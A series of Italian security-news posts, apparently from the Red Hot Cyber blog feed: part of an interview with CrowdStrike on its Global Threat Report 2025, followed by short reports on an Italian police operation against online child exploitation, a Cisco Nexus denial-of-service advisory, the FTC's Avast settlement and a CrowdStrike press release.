Tra le caratteristiche di questo malware si trova l’utilizzo di chiavi RC4 definite dagli attori per crittografare le comunicazioni di rete, rendendo più difficile l’intercettazione e l’analisi del traffico. KEYPLUG utilizza server C2 con una durata mediana di 96 giorni, con variazioni significative tra i diversi gruppi di avversari, il che complica ulteriormente il tracciamento e la mitigazione. Per cifrare le comunicazioni tra i server C2 e i client, KEYPLUG utilizza certificati TLS auto-firmati, spesso con valori di campo predefiniti, per evitare il rilevamento. Tra le strategie che le organizzazioni possono adottare per rilevarne e mitigarne le minacce suggeriamo l’implementazione di soluzioni di monitoraggio del traffico di rete per identificare comportamenti anomali e comunicazioni sospette con server C2 noti. É consigliabile mantenere aggiornate le firme di rilevamento nei sistemi di sicurezza per includere gli indicatori di compromissione (IOC) associati a KEYPLUG, come gli indirizzi IP e i domini C2. Occorre verificare e analizzare i certificati TLS utilizzati nelle comunicazioni di rete per identificare quelli auto-firmati e sospetti. E’ necessario anche implementare la segmentazione della rete per limitare i movimenti laterali degli attaccanti e contenere eventuali compromissioni e, infine, educare il personale sulla sicurezza informatica e sulle tecniche di phishing per ridurre il rischio di compromissioni iniziali.

7-RHC: Restando in tema geografico/geopolitico, nell’ultimo decennio si è registrato un aumento delle attività criminali informatiche sponsorizzate dallo stato, (ad esempio il caso della violazione di SolarWinds, collegata alla Russia, che ha colpito la maggior parte dei governi e delle organizzazioni non governative statunitensi). Viste le recenti tensioni e conflitti (Cina/Taiwan, Russia/Ucraina, Israele/Hamas) il vostro team di cyber threat intelligence cosa ha osservato?

Luca Nilo Livrieri:Il panorama delle minacce cyber nel 2024 ha riflesso in modo significativo le crescenti tensioni geopolitiche globali, come evidenziato dal team di cyber threat intelligence di CrowdStrike. L’anno ha visto un’intensificazione senza precedenti delle attività criminali informatiche sponsorizzate da stati nazionali, con Cina, Russia e Corea del Nord in prima linea.

Nel GTR 2025 abbiamo identificato 26 nuovi avversari, portando il totale degli attori mappati a 257. La Cina ha dimostrato una notevole evoluzione nelle sue capacità offensive, registrando un incremento del 150% nelle attività di spionaggio informatico rispetto al 2023. (VEDI RISPOSTA 9 con dettaglio).

Sul fronte russo, le attività cyber sono state fortemente influenzate dal conflitto in Ucraina. Gli attori russi hanno mantenuto una presenza aggressiva nel cyberspazio, concentrandosi sulla raccolta di intelligence relativa all’Ucraina e ai membri della NATO. Le loro operazioni hanno dimostrato una notevole capacità di adattamento e di sviluppo di tecniche sempre più sofisticate.

La Corea del Nord ha invece mostrato un approccio distintivo, focalizzandosi principalmente sulla generazione di valuta attraverso operazioni cyber innovative. Il regime ha sviluppato schemi elaborati che includono frodi nel settore IT, utilizzando tattiche come interviste virtuali e “laptop farms”. Questa strategia riflette il tentativo del paese di aggirare le sanzioni internazionali attraverso mezzi cyber.

Il quadro complessivo emerso nel report evidenzia come le tensioni geopolitiche si siano tradotte in un’escalation significativa delle attività cyber sponsorizzate dagli stati. Questi attori hanno dimostrato una crescente sofisticazione nelle loro operazioni, integrando perfettamente le attività cyber con più ampi obiettivi strategici e geopolitici. Tale evoluzione sottolinea l’importanza crescente del dominio cyber come teatro di operazioni per il perseguimento di obiettivi statali, richiedendo un approccio sempre più sofisticato alla cybersecurity e una maggiore cooperazione internazionale nella risposta a queste minacce.

8-RHC: Riguardo la Corea del Nord, cosa avete osservato nei gruppi criminali che sono attivi per finanziare il regime di Pyongyang?

Luca Nilo Livrieri:Nel corso del 2024 il nostro team di cyber threat intelligence ha osservato che i gruppi criminali nordcoreani hanno continuato a focalizzarsi su operazioni informatiche atte a finanziare il regime di Pyongyang. Tra i principali elementi emersi dal nostro report c’è una innovazione nelle Operazioni di E-Crime: gruppi nordcoreani hanno innovato le loro operazioni di monetizzazione, utilizzando schemi di lavoro IT su larga scala in tutto il mondo.

È emerso come gruppo particolarmente attivo FAMOUS CHOLLIMA (304 incidenti legati a FAMOUS CHOLLIMA tracciati da CrowdStrike nel 2024). Quasi il 40% di questi incidenti rappresentava operazioni di insider threat.

I gruppi nordcoreani hanno utilizzato tecniche di social engineering per supportare la creazione di profili LinkedIn falsi con testi generati da strumenti di intelligenza artificiale generativa (genAI) e hanno sfruttato l’AI per fornire risposte più credibili durante i colloqui di lavoro. Con queste tecniche è stato possibile ingannare i recruiter e farsi assumere all’interno di grandi aziende come sviluppatori di software e tecnici IT. I “dipendenti” si facevano spedire i laptop aziendali in dotazione presso “Laptop farms” in paesi specifici per ottenere un IP pubblico di provenienza “trusted” (es. USA) e, una volta ottenuto l’accesso alle reti aziendali, installavano sui computer delle aziende strumenti di gestione remota (RMM) e estensioni del browser malevole per esfiltrare dati o eseguire altre attività malevole.

9-RHC: In base alle vostre indagini di intelligence, chi ha dominato nel 2024 il Threat Landscape a livello globale?

Luca Nilo Livrieri:Nel 2024 il panorama delle minacce cyber globali è stato caratterizzato da una predominanza significativa degli attori legati alla Cina, come già evidenziato. Le operazioni di spionaggio informatico cinesi hanno raggiunto livelli di maturità senza precedenti, registrando un incremento del 150% rispetto all’anno precedente. Questa escalation è stata accompagnata da un notevole perfezionamento delle capacità operative e della gestione infrastrutturale, in particolare attraverso l’implementazione sofisticata di reti di relay box operativi (ORB) per mascherare le loro attività.

Un aspetto particolarmente significativo del 2024 è stata l’identificazione infatti di sette nuovi attori legati alla Cina. Questo rappresenta un’evoluzione strategica importante, segnando il passaggio da operazioni di tipo “smash-and-grab” a intrusioni più mirate e sofisticate, ciascuna con obiettivi specifici e ben definiti.

La risposta degli attori cinesi alle crescenti misure di contrasto implementate da governi, forze dell’ordine e ricercatori di sicurezza, è stata notevole. Hanno intensificato l’uso di tecniche di offuscamento, sfruttando reti ORB e condividendo strumenti tra diversi gruppi, dimostrando una maggiore resilienza operativa e capacità di mantenere l’anonimato.

L’impatto di queste operazioni si è fatto sentire in modo trasversale in tutti i settori a livello globale, con un’intensità particolare in alcuni ambiti strategici. I settori dei servizi finanziari, mediatico, manifatturiero e ingegneria industriale hanno registrato aumenti drammatici nelle attività malevole, con incrementi che hanno raggiunto il 200-300% rispetto agli anni precedenti.

10-RHC: Diamo ora uno sguardo alla difesa, può spiegare come Falcon Adversary OverWatch, Falcon Next-Gen SIEM (crowdstrike.com/platform/next-…) ed i Counter Adversary Playbooks possano aiutare nel creare programmi di monitoraggio/intelligence completi e personalizzati?

Luca Nilo Livrieri:La combinazione di Falcon Adversary OverWatch, Falcon Next-Gen SIEM e Counter Adversary Playbooks rappresenta un approccio integrato alla sicurezza che permette di creare programmi di monitoraggio e intelligence altamente efficaci e personalizzati. Falcon Adversary OverWatch fornisce un monitoraggio proattivo 24/7 delle attività sospette, con analisti esperti che valutano in tempo reale potenziali minacce. Questo servizio è particolarmente efficace nell’identificare le tattiche hands-on-keyboard e le tecniche di living-off-the-land che, come evidenziato nel GTR 2025, rappresentano il 79% delle intrusioni rilevate.

La capacità di OverWatch di distinguere tra attività legittime e malevole è cruciale, specialmente considerando la crescente sofisticazione degli attacchi. Falcon Next-Gen SIEM amplifica queste capacità integrando e correlando dati da diverse fonti in un’unica piattaforma di gestione degli eventi di sicurezza. La soluzione sfrutta l’intelligenza artificiale e il machine learning per analizzare grandi volumi di dati, identificando pattern sospetti e anomalie che potrebbero indicare un’intrusione. La sua architettura cloud-native permette una scalabilità e flessibilità superiori rispetto ai SIEM tradizionali. I Counter Adversary Playbooks completano il quadro fornendo procedure operative standardizzate e best practice specifiche per contrastare determinate tipologie di attaccanti. Questi playbook, basati su anni di osservazione e analisi delle tattiche degli avversari, permettono di: anticipare le mosse degli attaccanti, implementare contromisure mirate, accelerare i tempi di risposta agli incidenti e standardizzare le procedure di risposta.

L’integrazione di questi tre elementi permette di creare un programma di sicurezza che non solo rileva e risponde alle minacce, ma le anticipa e le previene attivamente, adattandosi continuamente all’evoluzione del panorama delle minacce. La personalizzazione di questi strumenti consente inoltre di allineare le difese alle specifiche esigenze e rischi dell’organizzazione, creando un sistema di protezione su misura e altamente efficace.

11-RHC: Quali sono i punti di forza del vostro prodotto Falcon Next-Gen SIEM? In cosa vi distinguete rispetto ai vostri competitor?

Luca Nilo Livrieri: Falcon Next-Gen SIEM si distingue nel mercato per diverse caratteristiche innovative e vantaggi competitivi significativi. La piattaforma si basa su un’architettura cloud-nativa che elimina la necessità di infrastrutture on-premise complesse, offrendo scalabilità immediata e costi operativi ridotti. Questa architettura moderna permette di processare e analizzare in tempo reale volumi di dati enormi, senza i limiti tradizionali dei SIEM legacy. Un punto di forza distintivo è l’integrazione nativa con l’ecosistema Falcon, che fornisce un contesto di threat intelligence immediato e accurato. Questo significa che ogni alert viene automaticamente arricchito con informazioni contestuali provenienti dal vasto database di minacce di CrowdStrike, permettendo una valutazione più rapida e precisa delle minacce.

La piattaforma eccelle nell’analisi comportamentale, utilizzando algoritmi di machine learning avanzati per identificare anomalie e potenziali minacce. Questo approccio è particolarmente efficace nel rilevare attacchi sofisticati che potrebbero sfuggire ai sistemi tradizionali, come le tecniche “living off the land” e gli attacchi senza malware che, come evidenziato nel GTR 2025, rappresentano la maggioranza delle intrusioni moderne. Un altro elemento distintivo è la capacità di fornire visibilità completa attraverso diversi ambienti – cloud, on-premise e ibridi – con una singola console di gestione. Questo elimina i silos informativi e semplifica significativamente le operazioni di security.

La piattaforma include anche capacità avanzate di automazione e orchestrazione, che permettono di rispondere rapidamente agli incidenti riducendo i tempi di risposta e il carico di lavoro manuale per i team di sicurezza. Infine, il modello di pricing trasparente e prevedibile, basato su sottoscrizione, elimina i costi nascosti tipici dei SIEM tradizionali legati all’ingestione e alla conservazione dei dati. Queste caratteristiche, combinate con il supporto continuo del team CrowdStrike e l’accesso a threat intelligence costantemente aggiornata, rendono Falcon Next-Gen SIEM una soluzione all’avanguardia nel panorama della sicurezza informatica.

12-RHC: Per quanto riguarda tattiche, tecniche e procedure (TTP) dei threat actors, in base al vostro monitoraggio durante il 2024, qual è stata la frequenza di attacchi attraverso lo sfruttamento vulnerabilità consecutive (exploit chaining), con l’abuso di funzionalità legittime (tecniche LOTL, Living Off The Land) o con Zero Days?

Vi sono possibili previsioni su questo per il 2025?

Luca Nilo Livrieri: Nel 2024 CrowdStrike ha osservato un aumento significativo nell’uso di tattiche, tecniche e procedure (TTP) avanzate da parte degli attori delle minacce, in particolare attraverso lo sfruttamento di vulnerabilità consecutive (exploit chaining), l’abuso di funzionalità legittime (tecniche LOTL, Living Off The Land) e l’uso di vulnerabilità zero-day.

Per quanto riguarda l’Exploit Chaining, gli attori delle minacce hanno frequentemente utilizzato catene di exploit per combinare più vulnerabilità e ottenere esecuzione di codice remoto (RCE) non autenticata. Ad esempio, nel novembre 2024, sono stati osservati attori che hanno combinato una vulnerabilità di bypass (CVE-2024-0012) con una vulnerabilità di escalation dei privilegi (CVE-2024-9474) nel software PAN-OS di Palo Alto Networks. Questo approccio ha consentito agli attori di aumentare le proprie capacità e l’impatto sugli obiettivi.

Essi hanno continuato a sfruttare funzionalità legittime (LOTL) dei sistemi per eseguire attacchi. Ad esempio, la funzionalità xp_cmdshell di Microsoft SQL Server è stata abusata per ottenere RCE in vari prodotti.

Gli attaccanti hanno continuato a sfruttare, inoltre, vulnerabilità zero-day per ottenere accesso iniziale e condurre attività malevole. Ad esempio, nel settembre 2024, un attore sconosciuto ha sfruttato una vulnerabilità di divulgazione di file (CVE-2024-21287) per ottenere credenziali in chiaro e successivamente ha sfruttato una vulnerabilità di deserializzazione (CVE-2024-20953) per compromettere i dispositivi.

CrowdStrike prevede che queste tattiche continueranno a essere prevalenti e si evolveranno ulteriormente nel 2025: l’exploit chaining, l’abuso di funzionalità legittime e lo sfruttamento di zero-day continueranno a rappresentare una minaccia significativa, richiedendo alle organizzazioni di adottare misure proattive.

13-RHC: L’abuso di account validi è diventato il principale vettore di accesso iniziale; le credenziali spesso vengono ottenute attraverso l’uso di information stealers o il social engineering.

Qual è l’impatto di ciò in attacchi a infrastrutture cloud aziendali?

Luca Nilo Livrieri: L’abuso di account validi è emerso come vettore principale di accesso iniziale agli ambienti cloud aziendali, rappresentando una minaccia significativa per la sicurezza delle infrastrutture cloud moderne.

Secondo il GTR 2025 questa tendenza ha registrato un impatto particolarmente rilevante, con un 35% di incidenti cloud legati proprio all’abuso di credenziali legittime che si lega al dato relativo agli annunci pubblicitari di credenziali degli access broker che sono aumentati del 50% su base annua.

Gli attaccanti hanno perfezionato le loro strategie di acquisizione delle credenziali, utilizzando principalmente due approcci: l’impiego di information stealers e di sofisticate tecniche di social engineering. Una volta ottenuto l’accesso iniziale attraverso credenziali valide, gli attori delle minacce possono muoversi lateralmente nell’ambiente cloud senza destare sospetti, sfruttando la legittimità apparente delle loro azioni per eludere i sistemi di sicurezza tradizionali.

La persistenza negli ambienti compromessi viene spesso stabilita attraverso la registrazione di dispositivi per l’autenticazione MFA o la creazione di backdoor sofisticate. Ciò permette agli attaccanti di mantenere l’accesso anche dopo eventuali modifiche alle credenziali iniziali. Particolarmente preoccupante è la capacità di questi attori di eludere le difese tradizionali, poiché l’uso di credenziali legittime rende estremamente difficile distinguere le attività malevoli da quelle lecite.

SCATTERED SPIDER, ad esempio, ha dimostrato particolare abilità nell’utilizzare account SSO compromessi per accedere a applicazioni critiche come SharePoint e Outlook, evidenziando la vulnerabilità delle soluzioni SaaS a questo tipo di attacchi. Questa tendenza è destinata a intensificarsi nel 2025, in quanto ci si aspetta che gli attaccanti continueranno a perfezionare le loro tecniche di evasione e a concentrarsi sempre più su obiettivi SaaS e cloud.

Per contrastare questa minaccia crescente, le organizzazioni devono implementare misure di sicurezza avanzate che vadano oltre la semplice protezione perimetrale. È essenziale adottare un approccio multilivello che includa il monitoraggio comportamentale, l’analisi delle anomalie e sistemi robusti di gestione delle identità e degli accessi. Solo attraverso una strategia di sicurezza completa e integrata sarà possibile mitigare efficacemente il rischio rappresentato dall’abuso di account validi negli ambienti cloud.

14-RHC: Ripensando agli attacchi in cui vengono sfruttate vulnerabilità di tipo Zero Day, è possibile rimanere un passo avanti (o almeno allo stesso passo) rispetto alla intraprendente esuberanza e alle continue innovazioni della criminalità digitale? Può l’attuale Intelligenza Artificiale Generativa (GenAI) essere di aiuto in questo?

Luca Nilo Livrieri:La sfida posta dalle vulnerabilità Zero Day nel panorama attuale della cybersecurity rappresenta una delle problematiche più complesse da affrontare, come evidenziato dai dati del GTR 2025. La rapidità con cui gli attaccanti riescono a sfruttare queste vulnerabilità, con tempi di “breakout” ridotti a una media di 48 minuti e picchi di efficienza di soli 51 secondi, impone un ripensamento radicale delle strategie difensive tradizionali.

L’Intelligenza Artificiale Generativa emerge come strumento potenzialmente rivoluzionario in questo contesto. La sua capacità di analizzare pattern complessi, generare scenari predittivi, e automatizzare risposte in tempo reale offre certamente nuove possibilità. L’implementazione di sistemi GenAI avanzati permette di sviluppare approcci proattivi alla sicurezza, anticipando potenziali vettori di attacco attraverso l’analisi predittiva e la simulazione di scenari complessi.

Nel contesto specifico delle vulnerabilità Zero Day, la GenAI dimostra particolare efficacia nell’analisi del codice sorgente e nell’identificazione di potenziali vulnerabilità prima che possano essere sfruttate. La sua capacità di processare e correlare enormi quantità di dati in tempo reale permette di identificare anomalie comportamentali e pattern sospetti che potrebbero indicare lo sfruttamento di vulnerabilità non ancora documentate. Tuttavia, è fondamentale riconoscere che la GenAI non rappresenta una soluzione definitiva, ma piuttosto un potente strumento da integrare in una strategia di sicurezza più ampia. L’efficacia di questi sistemi dipende infatti dalla qualità dei dati di addestramento e dalla loro continua ottimizzazione attraverso il feedback degli analisti di sicurezza. La componente umana rimane quindi essenziale, specialmente nell’interpretazione contestuale delle minacce e nella definizione delle strategie di risposta.

La vera innovazione risiede nella sinergia tra expertise umana e capacità computazionali della GenAI, sinergia che permette di sviluppare sistemi di difesa adattivi che possano evolversi rapidamente in risposta a nuove minacce, mantenendo al contempo la capacità di discriminazione e il giudizio critico necessari per evitare falsi positivi e ottimizzare le risorse di sicurezza. L’implementazione di framework di sicurezza basati su GenAI richiede un approccio olistico che includa monitoraggio continuo, threat hunting proattivo e capacità di risposta rapida agli incidenti. La formazione continua del personale di sicurezza nell’utilizzo efficace di questi strumenti diventa cruciale per massimizzare il potenziale.

L’integrazione della GenAI nelle strategie di sicurezza moderne offre infatti la possibilità di ridurre significativamente il divario temporale tra l’identificazione di una vulnerabilità e la sua mitigazione. Questo, combinato con approcci tradizionali di sicurezza e expertise umana, rappresenta attualmente la migliore strategia per mantenere una postura di sicurezza robusta di fronte all’evoluzione continua delle minacce Zero Day.

15-RHC: Ci può parlare di Charlotte AI, il vostro Generative AI Assistant? Siamo curiosi di sapere come è stato addestrato e su che stack tecnologico hardware/software sia basato (https://www.crowdstrike.com/en-us/resources/demos/conversations-with-charlotte-ai-at-risk-user-accounts/).

Luca Nilo Livrieri: Charlotte AI rappresenta un’implementazione di un sistema di intelligenza artificiale generativa con capacità agentic, che abbiamo integrato nativamente nella piattaforma Falcon di CrowdStrike. L’architettura multi-tenant, cloud-native, dell’assistente è stata progettata per operare su scala enterprise, processando petabyte di dati telemetrici in tempo reale attraverso una sofisticata infrastruttura distribuita.

L’architettura di machine learning sfrutta tecniche avanzate di transfer learning da modelli pre-addestrati, con fine-tuning continuo su dati cliente, ensemble methods per migliorare l’accuracy e sofisticati feedback loop per continuous learning. Il sistema di monitoring fornisce telemetria real-time delle performance, metriche di accuracy e precision, latency tracking e resource utilization monitoring.

Questa implementazione tecnica rappresenta un significativo avanzamento nell’applicazione di tecnologie AI alla cybersecurity, combinando modelli di machine learning all’avanguardia con architetture distribuite scalabili. La piattaforma evolve continuamente attraverso l’introduzione di nuove capacità tecniche e ottimizzazioni delle performance, mantenendo un focus sulla scalabilità enterprise e sulla sicurezza dei dati.

L’architettura modulare garantisce l’adattabilità alle minacce emergenti e alle esigenze, sempre in evoluzione, dei team di sicurezza, permettendo l’integrazione continua di nuovi modelli e capacità analitiche aiutando nelle fasi di detection, investigation e response.

16-RHC: Luca, la ringraziamo ancora per averci dato la possibilità di farle questa intervista sul vostro Global Threat Report 2025. C’è qualcosa che vuole aggiungere o che reputa interessante porre all’attenzione dei nostri lettori?

Luca Nilo Livrieri: Si, mi piacerebbe chiudere con qualche raccomandazione e best practices che suggeriamo di seguire:

1. Proteggere l’intero ecosistema delle identità adottando MFA resistenti al phishing, implementando politiche di accesso forti e utilizzando strumenti di rilevamento delle minacce alle identità integrati con piattaforme XDR.
2. Eliminare i gap di visibilità cross-domain: modernizzando le strategie di rilevamento e risposta con soluzioni XDR e SIEM di nuova generazione, svolgendo threat hunting proattivo e utilizzando intelligence sulle minacce.
3. Difendere il cloud come infrastruttura core: utilizzare CNAPP con capacità CDR, eseguire audit regolari per scoprire configurazioni errate e vulnerabilità non patchate.
4. Dare priorità al patching dei sistemi critici e utilizzare strumenti come Falcon Exposure Management per concentrarsi sulle vulnerabilità ad alto rischio.
5. Adottare un approccio basato sull’intelligence, integrare l’intelligence nelle operazioni di sicurezza, avviare programmi di consapevolezza degli utenti e svolgere esercitazioni di tabletop e red/blue teaming.

L'articolo Red Hot Cyber Intervista CrowdStrike sul Global Threat Report 2025 proviene da il blog della sicurezza informatica.

La Procura Distrettuale di Catania ha coordinato una operazione nazionale contro lo sfruttamento sessuale dei minori online condotta dalla Polizia di Stato. Si tratta di una tra le più vaste azioni compiute ad oggi in Italia. Oltre 500 operatori della Polizia Postale hanno eseguito oltre 100 perquisizioni nei confronti di altrettanti indagati, traendo in arresto 34 persone.

I dettagli della operazione saranno illustrati alle ore 10.30 presso la sala stampa della Procura Distrettuale sita in viale XX Settembre n.51.

La Polizia di Stato dimostra ancora una volta la sua determinazione nel contrastare i reati più odiosi, ribadendo il proprio impegno nella tutela dei più vulnerabili. Le indagini, condotte con strumenti tecnologici avanzati e in stretta collaborazione con organismi internazionali, hanno permesso di smantellare una rete di scambio di materiale pedopornografico, individuando decine di soggetti coinvolti in attività illecite a danno di minori.

Questo genere di operazioni rappresenta una delle sfide più difficili per gli investigatori, costretti a visionare e analizzare contenuti che hanno un impatto devastante non solo sul piano sociale, ma anche psicologico. L’esposizione prolungata a materiale di questo tipo richiede una grande forza mentale e un costante supporto per coloro che si occupano di queste indagini, consapevoli che il loro lavoro è essenziale per salvaguardare l’infanzia da pericoli sempre più insidiosi.

Nonostante la complessità e il peso emotivo di questa missione, si tratta di un compito che qualcuno deve assumersi per il bene della comunità. L’impegno incessante della Polizia Di Stato, con il coordinamento delle autorità giudiziarie, testimonia la volontà di non lasciare spazio all’impunità e di colpire duramente chiunque si renda responsabile di crimini così gravi.

La lotta alla pedopornografia online continua senza sosta, con l’obiettivo di proteggere i più deboli e restituire giustizia alle vittime.

L'articolo Operazione Hello: Maxi Blitz Contro i Mostri Del Web! Arresti e Perquisizioni in 56 Città proviene da il blog della sicurezza informatica.

Cisco ha rilasciato un avviso di sicurezza che mette in allerta le aziende e gli amministratori di rete: una vulnerabilità nei suoi switch della serie Nexus 3000 e 9000 potrebbe consentire ad attaccanti di scatenare una condizione di Denial-of-Service (DoS), causando il riavvio improvviso dei dispositivi e l’interruzione delle operazioni di rete.

La vulnerabilità

La problematica risiede nel modulo di diagnostica per il monitoraggio dello stato di salute degli switch. Una gestione errata di specifici frame Ethernet consente a un attaccante non autenticato, ma con accesso alla rete locale, di inviare un flusso continuo di frame Ethernet appositamente confezionati per mandare in tilt il dispositivo.

L’esito? Il riavvio forzato dello switch, con tutte le conseguenze del caso: perdita di connettività, interruzione dei servizi e potenziali impatti critici per le infrastrutture aziendali.

Quali modelli sono a rischio?

Gli switch Cisco interessati sono:

• Nexus 3100 Series
• Nexus 3200 Series
• Nexus 3400 Series
• Nexus 3600 Series
• Nexus 9200 Series (in modalità standalone NX-OS)
• Nexus 9300 Series (in modalità standalone NX-OS)
• Nexus 9400 Series (in modalità standalone NX-OS)

Cisco ha confermato che questa vulnerabilità non impatta altri dispositivi come le soluzioni Firepower, la serie MDS e alcuni switch Nexus non elencati.

Come identificare un attacco in corso?

Un exploit riuscito può provocare il fallimento consecutivo dei test diagnostici “L2ACLRedirect health monitoring” o “RewriteEngineLoopback” sui Nexus 3100 e 3200. Segnali di compromissione possono essere rilevati nei log di sistema con messaggi come:

• “L2ACLREDIRECT_LOOPBACK_TEST_FAIL”
• “REWRITE_ENGINE_LOOPBACK_TEST_FAIL”

Questi eventi precedono un riavvio forzato del dispositivo con il codice di errore “Kernel Panic”. Tuttavia, Cisco avverte che tali messaggi possono apparire anche per cause non legate alla vulnerabilità.

Mitigazioni e soluzioni

Cisco ha già rilasciato aggiornamenti software per risolvere la vulnerabilità. I clienti con contratti di supporto possono ottenere le patch attraverso i canali di aggiornamento ufficiali.

Per verificare la propria esposizione, Cisco mette a disposizione:

• Cisco Software Checker, uno strumento per identificare le versioni vulnerabili del software NX-OS.
• Cisco Product Security Incident Response Team (PSIRT), che monitora attivamente le minacce e fornisce indicazioni per la protezione dei dispositivi.

Conclusione

Sebbene al momento non risultino exploit attivi in the wild, questa vulnerabilità rappresenta un rischio concreto per le infrastrutture di rete aziendali. Un attacco DoS su switch core potrebbe avere conseguenze disastrose, bloccando servizi essenziali e compromettendo la business continuity.

Per questo motivo, gli amministratori di rete devono intervenire immediatamente, verificando le versioni dei propri dispositivi e applicando le patch rilasciate da Cisco. La sicurezza delle reti aziendali non è mai una questione da rimandare.

L'articolo Cisco Nexus: Vulnerabilità critica consente di causare condizione di Denial-of-Service! proviene da il blog della sicurezza informatica.

“La Federal Trade Commission sta inviando moduli di reclamo ai consumatori che hanno acquistato un software antivirus commercializzato in modo ingannevole da Avast”, viene riportato all’interno del sito web ufficiale del governo degli Stati Uniti della Federal Trade Commission.

La FTC ha affermato in una denuncia del febbraio 2024 che Avast ha ingannato gli utenti affermando che il suo software avrebbe protetto la privacy dei consumatori bloccando il tracciamento di terze parti, ma non è riuscita a informare adeguatamente i consumatori che avrebbe raccolto e venduto i loro dati di navigazione dettagliati e reidentificabili. La FTC ha affermato che Avast ha venduto tali dati a più di 100 terze parti tramite la sua sussidiaria, Jumpshot.

Come parte di un ordine di conciliazione con la FTC, Avast è stata tenuta a pagare 16,5 milioni di dollari, che saranno utilizzati per risarcire i consumatori. L’ordine vieta inoltre ad Avast di travisare il modo in cui utilizza i dati che raccoglie e di vendere o concedere in licenza dati di navigazione da prodotti a marchio Avast a terze parti per scopi pubblicitari, insieme ad altri requisiti.

La FTC sta inviando notifiche via e-mail a 3.690.813 consumatori che hanno acquistato software antivirus da Avast tra agosto 2014 e gennaio 2020. I consumatori idonei a presentare domanda riceveranno una notifica via e-mail da ora al 7 marzo 2025.

I consumatori idonei possono presentare un reclamo online su www.ftc.gov/Avast. Gli importi dei pagamenti dipenderanno da diversi fattori, tra cui il numero di persone che presentano reclami.

La scadenza per presentare un reclamo è il 5 giugno 2025. I consumatori che hanno domande o hanno bisogno di aiuto per presentare un reclamo devono chiamare l’amministratore dei reclami al numero 866-290-0165 o inviare un’e-mail a info@AvastSettlement.com.

L'articolo Avast condannata a pagare 16,5 milioni di dollari agli utenti per aver venduto i loro dati proviene da il blog della sicurezza informatica.

CrowdStrike (NASDAQ: CRWD) ha pubblicato oggi il “Global Threat Report 2025”, che rivela la crescente aggressività delle operazioni cyber della Cina, un aumento dell’ingegneria sociale basata su GenAI, la ricerca e l’utilizzo delle vulnerabilità da parte di gruppi sponsorizzati dagli Stati, e un netto incremento degli attacchi privi di malware basati sull’identità.

Il report rivela che gli avversari legati alla Cina hanno intensificato del 150% le operazioni cyber sponsorizzate dallo Stato, con attacchi mirati nei settori dei servizi finanziari, dei media, manifatturiero e dell’industria, che hanno registrato un’impennata fino al 300%.

Allo stesso tempo, gli avversari di tutto il mondo si stanno avvalendo di tecniche di inganno e manipolazione generate con l’uso dell’intelligenza artificiale, sfruttando credenziali rubate ed eseguendo sempre più spesso attacchi cross-domain – approfittando delle lacune tra endpoint, cloud e identità – per eludere i controlli di sicurezza e agire inosservati nell’ombra.

Il passaggio a intrusioni prive di malware basate sull’abuso di accessi legittimi, unito a tempi di breakout mai registrati prima, lascia ai difensori pochissimo margine di errore. Per fermare gli attacchi moderni, i team di sicurezza devono eliminare i gap di monitoraggio (punti ciechi nella sicurezza), rilevare i movimenti degli avversari in tempo reale e bloccare gli attacchi prima che si intensifichino, perché una volta che gli avversari riescono ad entrare è già troppo tardi.

Principali risultati emersi nel Global Threat Report di CrowdStrike

La ricerca di CrowdStrike, che ha analizzato più di 250 avversari conosciuti e 140 cluster di attività emergenti, rivela:

• Lo spionaggio informatico cinese diventa sempre più aggressivo: nel 2024 CrowdStrike ha identificato sette nuovi gruppi di avversari legati alla Cina, contribuendo ad un aumento del 150% delle operazioni di spionaggio informatico. I settori più critici hanno registrato un’impennata fino al 300% negli attacchi mirati.
• La GenAI potenzia l’ingegneria sociale: le tecniche di phishing e impersonificazione basate sull’intelligenza artificiale hanno alimentato un aumento del 442% del voice phishing (vishing) tra il primo ed il secondo semestre del 2024. Gruppi di eCrime avanzati come CURLY SPIDER, CHATTY SPIDER e PLUMP SPIDER hanno sfruttato l’ingegneria sociale per rubare credenziali, stabilire sessioni remote di supporto help desk ed eludere il rilevamento.
• L’Iran utilizza la GenAI per individuare e sfruttare le vulnerabilità: nel 2024, gli attori legati all’Iran hanno sperimentato in misura crescente la GenAI per la ricerca di vulnerabilità, lo sviluppo di exploit e la gestione delle patch sulle reti nazionali, in linea con le iniziative governative sull’AI.
• Dall’intrusione all’accesso – Boom di attacchi senza l’utilizzo di malware: il 79% degli attacchi per ottenere l’accesso iniziale avviene ormai senza l’uso di malware, mentre gli annunci di access broker sono aumentati del 50% su base annua. Gli avversari sfruttano credenziali compromesse per infiltrarsi nei sistemi come utenti legittimi, muovendosi lateralmente senza essere rilevati attraverso attività dirette di tipo hands-on keyboard.
• Le minacce interne continuano a crescere: l’avversario DPRK-nexus il gruppo FAMOUS CHOLLIMA, legato alla Corea del Nord (DPKR) è stato responsabile di 304 attacchi scoperti nel 2024. Il 40% di questi incidenti ha riguardato operazioni di minaccia interna, con gli avversari che si sono infiltrati nei sistemi aziendali spacciandosi per dipendenti legittimi al fine di ottenere accesso ai sistemi e condurre attività malevole.
• Tempo di breakout a velocità record: il tempo medio di breakout negli attacchi eCrime è sceso a 48 minuti, con il caso più veloce registrato a 51 secondi, lasciando ai difensori pochissimo tempo per reagire.
• Ambienti cloud sotto assedio: le intrusioni cloud di nuova origine e non attribuite a specifici attaccanti sono aumentate del 26% su base annua. L’abuso di account validi è la principale tecnica di accesso iniziale e rappresenta il 35% degli incidenti cloud nel primo semestre 2024.
• Le vulnerabilità non corrette restano un obiettivo chiave: il 52% delle vulnerabilità osservate era legato all’accesso iniziale, evidenziando la necessità critica di proteggere i punti di ingresso prima che gli avversari riescano a stabilire una presenza persistente nei sistemi.

“Il cyber spionaggio cinese, sempre più aggressivo, unito alla rapida diffusione di strumenti di inganno basati sull’intelligenza artificiale, sta costringendo le organizzazioni a ripensare il proprio approccio alla sicurezza”, ha dichiarato Adam Meyers, Head of Counter Adversary Operations di CrowdStrike. “Gli avversari sfruttano le lacune nell’identità, fanno leva sul social engineering e si muovono tra i diversi domini senza essere individuati, rendendo inefficaci le difese tradizionali. Per fermare le violazioni è necessaria una piattaforma unificata, basata su intelligence e threat hunting in tempo reale, che metta in correlazione identità, cloud e attività degli endpoint per eliminare i punti ciechi in cui si nascondono gli avversari”.

